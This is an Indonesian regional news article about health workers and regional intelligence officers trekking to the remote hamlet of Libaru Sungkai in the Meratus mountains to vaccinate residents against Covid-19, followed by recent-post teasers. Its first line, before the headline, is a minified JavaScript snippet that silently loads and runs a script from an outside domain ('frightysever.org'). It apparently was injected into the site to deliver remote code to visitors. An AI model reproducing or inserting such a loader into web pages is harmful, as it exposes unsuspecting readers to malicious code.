(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Menembus Dusun Libaru Sungkai di Meratus Demi Vaksinasi Warga


KANALKALIMANTAN.COM, PARINGIN – Menjangkau layanan vaksinasi menuju dusun terpencil di Kecamatan Halong, Kabupaten Balangan, harus ditempuh dengan cara turun naik gunung hingga menyeberang sungai.

Dinas Kesehatan Kabupaten Balangan bersama Badan Intelijen Negara (BIN) Daerah Kalimantan Selatan mendatangi kawasan pemukiman penduduk di pedalaman Pegunungan Meratus.

BIN Daerah Kalsel bersama Dinkes Balangan dibantu warga desa mendatangi Dusun Libaru Sungkai, Desa Binuang Santang, Kecamatan Halong, Kabupaten Balangan.

Dusun tersebut merupakan wilayah terpencil di Balangan yang berada di pegunungan Meratus yang juga menjadi daerah perbatasan.

 

 

Baca juga: BI Rilis 7 Uang Kertas Rupiah Baru, Begini Penampakannya

Tidak mudah untuk menjangkau daerah ini. Jalan setapak dan melintas di jalur pegunungan membuat tim harus ekstra mengerahkan tenaga. Dibutuhkan pula skill berkendara yang mumpuni untuk bisa sampai tujuan.

Dari ibu kota Kabupaten Balangan yakni Paringin, waktu tempuh menuju Dusun Libaru Sungkai bisa mencapai empat jam kebih. Terlebih harus melewati medan pegunungan yang menantang dan hanya bisa dilintasi kendaraan roda dua.

Jalan terjal menanjak menuju Dusun Libaru Sungkai.foto: ist

Kedatangan tim kesehatan dan anggota BIN Daerah Kalsel ke Dusun Libaru Sungkai disambut baik warga setempat.

Penduduk dusun berkumpul di balai adat untuk vaksinasi sekaligus periksa kesehatan.

Ketua Adat Wilayah Desa Binuang Santang, Gapure menyampaikan terima kasihnya atas kehadiran tim kesehatan yang memberikan pelayanan kesehatan dan vaksinasi Covid-19 bagi warga Dusun Libaru Sungkai.

“Kedatangan tim vaksinasi ke tempat kami menggambarkan bentuk pelayanan mereka yang luar biasa, hingga ke wilayah terpencil seperti tempat ini,” kata Gapure, Rabu (17/8/2022).

Terlebih pada kegiatan yang berlangsung selama dua hari tersebut, masyarakat juga antusias berdatangan untuk memeriksakan kesehatan serta melakukan vaksinasi.

Baca juga: Kabur Bersembunyi 9 Jam, Pelaku Penusukan Maut di Cempaka Ditangkap Polisi

Sementara itu, Kepala BIN Daerah Kalsel, Brigjen Pol Dr Heri Armanto menjelaskan pihaknya tidak bisa hanya mengandalkan satu institusi saja, tetapi semua komponen harus bergerak bersama-sama untuk mensukseskan program vaksinasi Covid-19.

Gerak BIN katanya, hingga sekarang terus gencar memberikan fasilitas dan pelayanan agar vaksinasi Covid 19 terus berlanjut, sebagai upaya mendukung rencana pemerintah untuk mendorong transisi pandemi ke endemi.(Kanalkalimantan.com/alfi)

Reporter : ist
Editor : kk


Risa

Recent Posts

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

11 menit ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

1 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

2 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

5 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

6 jam ago

Rumah Kosong di Pekapuran Raya Banjarmasin Terbakar

KANALKALIMANTAN.COM, BANJARMASIN - Warga Jalan Harmoni III Kelurahan Pekapuran Raya, Kecamatan Banjarmasin Timur. Kota Banjarmasin,… Read More

7 jam ago

This website uses cookies.